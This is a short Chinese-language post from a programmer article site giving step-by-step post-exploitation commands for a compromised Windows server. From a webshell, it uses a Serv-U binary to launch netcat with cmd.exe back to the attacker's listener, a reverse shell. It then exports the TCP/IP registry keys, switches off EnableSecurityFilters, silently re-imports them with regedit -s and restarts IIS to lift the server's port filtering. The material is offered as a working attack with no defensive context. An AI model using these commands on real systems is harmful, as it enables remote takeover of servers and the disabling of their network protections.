欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  科技

解除TCP/IP限制的小技巧

程序员文章站 2022-09-13 15:10:56
解除TCP/IP限制的小技巧...

1.用nc反弹得到一个shell 

本机监听 nc -l -p 32 

webshell运行: 

x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port" 

得到一个shell 

2.cmd下导出注册表文件 
c:\>regedit -e x:\xxx\1.reg hkey_local_machine\system\controlset001\ser 
vices\tcpip 

c:\>regedit -e x:\xxx\2.reg hkey_local_machine\system\controlset002\services\tcpip 

c:\>regedit -e x:\xxx\3.reg hkey_local_machine\system\currentcontrolset\services\tcpip 

修改各文件 enablesecurityfilters 处 
将最后的1改为0 

3.将注册表文件导入 
x:\xxx>regedit -s 1.reg 
x:\xxx>regedit -s 2.reg 
x:\xxx>regedit -s 3.reg 
-s 为无提示 

重启命令 iisreset /reboot 

完成tcp/ip筛选限制